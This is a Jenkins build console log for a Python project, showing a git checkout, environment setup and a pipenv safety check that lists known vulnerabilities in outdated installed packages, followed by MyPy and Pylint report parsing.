Started by an SCM change Running as SYSTEM Building in workspace /var/jenkins_home/jobs/SolidBlue_III/workspace The recommended git tool is: NONE Warning: CredentialId "cd8fb110-f9c4-49d8-bd61-e71f44f42830" could not be found. > git rev-parse --resolve-git-dir /var/jenkins_home/jobs/SolidBlue_III/workspace/.git # timeout=10 Fetching changes from the remote Git repository > git config remote.origin.url https://tidalwave@bitbucket.org/tidalwave/solidblue3-p-src.git # timeout=10 Fetching upstream changes from https://tidalwave@bitbucket.org/tidalwave/solidblue3-p-src.git > git --version # timeout=10 > git --version # 'git version 2.30.2' > git fetch --tags --force --progress -- https://tidalwave@bitbucket.org/tidalwave/solidblue3-p-src.git +refs/heads/*:refs/remotes/origin/* # timeout=10 > git rev-parse refs/remotes/origin/master^{commit} # timeout=10 Checking out Revision 1a78c7d07abd366b987efa47d10e4d1206a9f709 (refs/remotes/origin/master) > git config core.sparsecheckout # timeout=10 > git checkout -f 1a78c7d07abd366b987efa47d10e4d1206a9f709 # timeout=10 Commit message: "Added ignorable diagnostic." > git rev-list --no-walk da5dde97992ac199d988a8573ac32d989157236b # timeout=10 [workspace] $ /bin/sh -xe /tmp/jenkins5890176478860587619.sh + ./.jenkins-script.sh ================================ git clone asdf fatal: destination path '/var/jenkins_home/jobs/SolidBlue_III/workspace/.asdf' already exists and is not an empty directory. ================================ asdf plugin-add python updating plugin repository... From https://github.com/asdf-vm/asdf-plugins eabdf06..00af419 master -> origin/master HEAD is now at 00af419 feat: adding plugin for avalanchego (#1058) Plugin named python already added ================================ asdf install python 3.9.0 python 3.9.0 is already installed ================================ asdf local python 3.9.0 ================================ pip install --user pipenv ./.jenkins-script.sh: line 22: : command not found rm -rf build __pycache__ echo "================================ Check" ================================ Check "/var/jenkins_home/.local/bin/pipenv" check Checking PEP 508 requirements... Passed! Checking installed package safety... 68477: virtualenv <20.21.0 resolved (20.2.1 installed)! Virtualenv version 20.21.0 addresses a race condition in `virtualenv.cli_run` where a `FileNotFoundError` could occur for a JSON file in `pypa/virtualenv/py_info/1`. This error happens if the underlying interpreter is updated, causing the JSON file to be deleted and rewritten. 73456: virtualenv <20.26.6 resolved (20.2.1 installed)! Affected versions of the virtualenv package are vulnerable to command injection. This vulnerability could allow an attacker to execute arbitrary commands by exploiting improperly quoted string placeholders in activation scripts. The vulnerable functions include various shell activation scripts where placeholders like __VIRTUAL_ENV__ are used. The exploitability depends on the ability to control the input to these placeholders. Users are advised to update to the version where a quoting mechanism has been implemented to mitigate this risk. This vulnerability is specific to environments where shell scripts are used for virtual environment activation. The issue is tracked under CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection'). 44492: pipenv >=2018.10.9,<=2021.11.23 resolved (2020.11.15 installed)! Pipenv 2022.1.8 includes a fix for CVE-2022-21668: Starting with version 2018.10.9 and prior to version 2022.1.8, a flaw in pipenv's parsing of requirements files allows an attacker to insert a specially crafted string inside a comment anywhere within a requirements.txt file, which will cause victims who use pipenv to install the requirements file to download dependencies from a package index server controlled by the attacker. By embedding malicious code in packages served from their malicious index server, the attacker can trigger arbitrary remote code execution (RCE) on the victims' systems. If an attacker is able to hide a malicious '--index-url' option in a requirements file that a victim installs with pipenv, the attacker can embed arbitrary malicious code in packages served from their malicious index server that will be executed on the victim's host during installation (remote code execution/RCE). When pip installs from a source distribution, any code in the setup.py is executed by the install process. https://github.com/pypa/pipenv/security/advisories/GHSA-qc9x-gjcv-465w 52365: certifi <2022.12.07 resolved (2020.12.5 installed)! Certifi 2022.12.07 includes a fix for CVE-2022-23491: Certifi 2022.12.07 removes root certificates from "TrustCor" from the root store. These are in the process of being removed from Mozilla's trust store. TrustCor's root certificates are being removed pursuant to an investigation prompted by media reporting that TrustCor's ownership also operated a business that produced spyware. Conclusions of Mozilla's investigation can be found in the linked google group discussion. https://github.com/certifi/python-certifi/security/advisories/GHSA-43fp-rhv2-5gv8 https://groups.google.com/a/mozilla.org/g/dev-security-policy/c/oxX69KFvsm4/m/yLohoVqtCgAJ 59956: certifi >=2015.04.28,<2023.07.22 resolved (2020.12.5 installed)! Certifi 2023.07.22 includes a fix for CVE-2023-37920: Certifi prior to version 2023.07.22 recognizes "e-Tugra" root certificates. e-Tugra's root certificates were subject to an investigation prompted by reporting of security issues in their systems. Certifi 2023.07.22 removes root certificates from "e-Tugra" from the root store. https://github.com/certifi/python-certifi/security/advisories/GHSA-xqr8-7jwr-rhp7 51499: wheel <0.38.1 resolved (0.35.1 installed)! Wheel 0.38.1 includes a fix for CVE-2022-40898: An issue discovered in Python Packaging Authority (PyPA) Wheel 0.37.1 and earlier allows remote attackers to cause a denial of service via attacker controlled input to wheel cli. https://pyup.io/posts/pyup-discovers-redos-vulnerabilities-in-top-python-packages 52495: setuptools <65.5.1 resolved (50.3.2 installed)! Setuptools 65.5.1 includes a fix for CVE-2022-40897: Python Packaging Authority (PyPA) setuptools before 65.5.1 allows remote attackers to cause a denial of service via HTML in a crafted package or custom PackageIndex page. There is a Regular Expression Denial of Service (ReDoS) in package_index.py. 72236: setuptools <70.0.0 resolved (50.3.2 installed)! Affected versions of Setuptools allow for remote code execution via its download functions. These functions, which are used to download packages from URLs provided by users or retrieved from package index servers, are susceptible to code injection. If these functions are exposed to user-controlled inputs, such as package URLs, they can execute arbitrary commands on the system. 39611: pyyaml <5.4 resolved (5.3.1 installed)! Pyyaml version 5.4 includes a fix for CVE-2020-14343: A vulnerability was discovered in the PyYAML library in versions before 5.4, where it is susceptible to arbitrary code execution when it processes untrusted YAML files through the full_load method or with the FullLoader loader. Applications that use the library to process untrusted input may be vulnerable to this flaw. This flaw allows an attacker to execute arbitrary code on the system by abusing the python/object/new constructor. This flaw is due to an incomplete fix for CVE-2020-1747. https://bugzilla.redhat.com/show_bug.cgi?id=1860466 45185: pylint <2.13.0 resolved (2.6.0 installed)! Pylint 2.13.0 fixes a crash when using the doc_params extension. https://github.com/PyCQA/pylint/issues/5322 39621: pylint <2.7.0 resolved (2.6.0 installed)! Pylint 2.7.0 includes a fix for vulnerable regular expressions in 'pyreverse'. https://github.com/pylint-dev/pylint/commit/5405dd5115d598fa69e49538d50ec79202b1b52e 66067: pylint >=0,<2.6.1 resolved (2.6.0 installed)! Pylint before 2.6.1 is susceptible to a Regular Expression Denial of Service (ReDoS) vulnerability due to issues in its pyreverse component. This issue arises from certain regular expressions in pyreverse that can be exploited by causing catastrophic backtracking, significantly slowing down the service by forcing it to take a disproportionate amount of time to process inputs. This vulnerability allows attackers to use specially crafted inputs that increase the processing time exponentially, potentially leading to a service becoming inaccessible to legitimate users. https://github.com/pylint-dev/pylint/commit/5405dd5115d598fa69e49538d50ec79202b1b52e 40291: pip <21.1 resolved (20.2.4 installed)! Pip 21.1 updates its dependency 'urllib3' to v1.26.4 due to security issues. 42559: pip <21.1 resolved (20.2.4 installed)! A flaw was found in python-pip in the way it handled Unicode separators in git references. A remote attacker could possibly use this issue to install a different revision on a repository. The highest threat from this vulnerability is to data integrity. 67599: pip <21.1 resolved (20.2.4 installed)! An issue was discovered in Pip (all versions) because it installs the version with the highest version number, even if the user had intended to obtain a private package from a private index. This only affects use of the --extra-index-url option, and exploitation requires that the package does not already exist in the public index (and thus the attacker can put the package there with an arbitrary version number). A warning was added about this behavior in version 21.1. NOTE: it has been reported that this is intended functionality and the user is responsible for using --extra-index-url securely. 62044: pip <23.3 resolved (20.2.4 installed)! Affected versions of Pip are vulnerable to Command Injection. When installing a package from a Mercurial VCS URL (ie "pip install hg+...") with pip prior to v23.3, the specified Mercurial revision could be used to inject arbitrary configuration options to the "hg clone" call (ie "--config"). Controlling the Mercurial configuration can modify how and which repository is installed. This vulnerability does not affect users who aren't installing from Mercurial. 40072: lxml <4.6.3 resolved (4.6.2 installed)! Lxml version 4.6.3 includes a fix for CVE-2021-28957: An XSS vulnerability was discovered in python-lxml's clean module versions before 4.6.3. When disabling the safe_attrs_only and forms arguments, the Cleaner class does not remove the formation attribute allowing for JS to bypass the sanitizer. A remote attacker could exploit this flaw to run arbitrary JS code on users who interact with incorrectly sanitized HTML. https://bugs.launchpad.net/lxml/+bug/1888153 43366: lxml <4.6.5 resolved (4.6.2 installed)! Lxml 4.6.5 includes a fix for CVE-2021-43818: Prior to version 4.6.5, the HTML Cleaner in lxml.html lets certain crafted script content pass through, as well as script content in SVG files embedded using data URIs. Users that employ the HTML cleaner in a security relevant context should upgrade to lxml 4.6.5 to receive a patch. 50748: lxml <4.9.1 resolved (4.6.2 installed)! Lxml 4.9.1 includes a fix for CVE-2022-2309: NULL Pointer Dereference allows attackers to cause a denial of service (or application crash). This only applies when lxml is used together with libxml2 2.9.10 through 2.9.14. libxml2 2.9.9 and earlier are not affected. It allows triggering crashes through forged input data, given a vulnerable code sequence in the application. The vulnerability is caused by the iterwalk function (also used by the canonicalize function). Such code shouldn't be in wide-spread use, given that parsing + iterwalk would usually be replaced with the more efficient iterparse function. However, an XML converter that serialises to C14N would also be vulnerable, for example, and there are legitimate use cases for this code sequence. If untrusted input is received (also remotely) and processed via iterwalk function, a crash can be triggered. 39525: jinja2 <2.11.3 resolved (2.11.2 installed)! This affects the package jinja2 from 0.0.0 and before 2.11.3. The ReDoS vulnerability is mainly due to the '_punctuation_re regex' operator and its use of multiple wildcards. The last wildcard is the most exploitable as it searches for trailing punctuation. This issue can be mitigated by Markdown to format user content instead of the urlize filter, or by implementing request timeouts and limiting process memory. 64227: jinja2 <3.1.3 resolved (2.11.2 installed)! Jinja2 before 3.1.3 is affected by a Cross-Site Scripting vulnerability. Special placeholders in the template allow writing code similar to Python syntax. It is possible to inject arbitrary HTML attributes into the rendered HTML template. The Jinja 'xmlattr' filter can be abused to inject arbitrary HTML attribute keys and values, bypassing the auto escaping mechanism and potentially leading to XSS. It may also be possible to bypass attribute validation checks if they are blacklist-based. 71591: jinja2 <3.1.4 resolved (2.11.2 installed)! Jinja is an extensible templating engine. The `xmlattr` filter in affected versions of Jinja accepts keys containing non-attribute characters. XML/HTML attributes cannot contain spaces, `/`, `>`, or `=`, as each would then be interpreted as starting a separate attribute. If an application accepts keys (as opposed to only values) as user input, and renders these in pages that other users see as well, an attacker could use this to inject other attributes and perform XSS. The fix for CVE-2024-22195 only addressed spaces but not other characters. Accepting keys as user input is now explicitly considered an unintended use case of the `xmlattr` filter, and code that does so without otherwise validating the input should be flagged as insecure, regardless of Jinja version. Accepting _values_ as user input continues to be safe. 70612: jinja2 >=0 resolved (2.11.2 installed)! In Jinja2, the from_string function is prone to Server Side Template Injection (SSTI) where it takes the source parameter as a template object, renders it, and then returns it. The attacker can exploit it with INJECTION COMMANDS in a URI. NOTE: The maintainer and multiple third parties believe that this vulnerability isn't valid because users shouldn't use untrusted templates without sandboxing. 47833: click <8.0.0 resolved (7.1.2 installed)! Click 8.0.0 uses 'mkstemp()' instead of the deprecated & insecure 'mktemp()'. https://github.com/pallets/click/issues/1752 make: *** [Makefile:15: check] Error 1 [MyPy] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace') [MyPy] -> found 0 issues (skipped 0 duplicates) [MyPy] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace') [MyPy] -> found 0 issues (skipped 0 duplicates) [MyPy] Successfully parsed console log [MyPy] -> found 0 issues (skipped 0 duplicates) [MyPy] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace') [MyPy] Skipping post processing [MyPy] No filter has been set, publishing all 0 issues [MyPy] Repository miner is not configured, skipping repository mining [MyPy] Successfully parsed console log [MyPy] -> found 0 issues (skipped 0 duplicates) [MyPy] Successfully parsed console log [MyPy] -> found 0 issues (skipped 0 duplicates) [MyPy] Successfully parsed console log [MyPy] -> found 0 issues (skipped 0 duplicates) [MyPy] Successfully parsed console log [MyPy] -> found 0 issues (skipped 0 duplicates) [MyPy] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace') [MyPy] Skipping post processing [MyPy] No filter has been set, publishing all 0 issues [MyPy] Repository miner is not configured, skipping repository mining [MyPy] Reference build recorder is not configured [MyPy] Obtaining reference build from same job (SolidBlue III) [MyPy] Using reference build 'SolidBlue_III #119' to compute new, fixed, and outstanding issues [MyPy] Issues delta (vs. reference build): outstanding: 0, new: 0, fixed: 0 [MyPy] No quality gates have been set - skipping [MyPy] Health report is disabled - skipping [MyPy] Created analysis result for 0 issues (found 0 new issues, fixed 0 issues) [MyPy] Attaching ResultAction with ID 'mypy' to build 'SolidBlue_III #120'. [Checks API] No suitable checks publisher found. [Pylint] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace') [Pylint] -> found 0 issues (skipped 0 duplicates) [Pylint] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace') [Pylint] -> found 0 issues (skipped 0 duplicates) [Pylint] Successfully parsed console log [Pylint] -> found 0 issues (skipped 0 duplicates) [Pylint] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace') [Pylint] Skipping post processing [Pylint] No filter has been set, publishing all 0 issues [Pylint] Repository miner is not configured, skipping repository mining [Pylint] Successfully parsed console log [Pylint] -> found 0 issues (skipped 0 duplicates) [Pylint] Successfully parsed console log [Pylint] -> found 0 issues (skipped 0 duplicates) [Pylint] Successfully parsed console log [Pylint] -> found 0 issues (skipped 0 duplicates) [Pylint] Successfully parsed console log [Pylint] -> found 0 issues (skipped 0 duplicates) [Pylint] Parsing console log (workspace: '/var/jenkins_home/jobs/SolidBlue_III/workspace') [Pylint] Skipping post processing [Pylint] No filter has been set, publishing all 0 issues [Pylint] Repository miner is not configured, skipping repository mining [Pylint] Reference build recorder is not configured [Pylint] Obtaining reference build from same job (SolidBlue III) [Pylint] Using reference build 'SolidBlue_III #119' to compute new, fixed, and outstanding issues [Pylint] Issues delta (vs. reference build): outstanding: 0, new: 0, fixed: 0 [Pylint] No quality gates have been set - skipping [Pylint] Health report is disabled - skipping [Pylint] Created analysis result for 0 issues (found 0 new issues, fixed 0 issues) [Pylint] Attaching ResultAction with ID 'pylint' to build 'SolidBlue_III #120'. [Checks API] No suitable checks publisher found. Started calculate disk usage of build Finished Calculation of disk usage of build in 0 seconds Started calculate disk usage of workspace Finished Calculation of disk usage of workspace in 0 seconds Finished: SUCCESS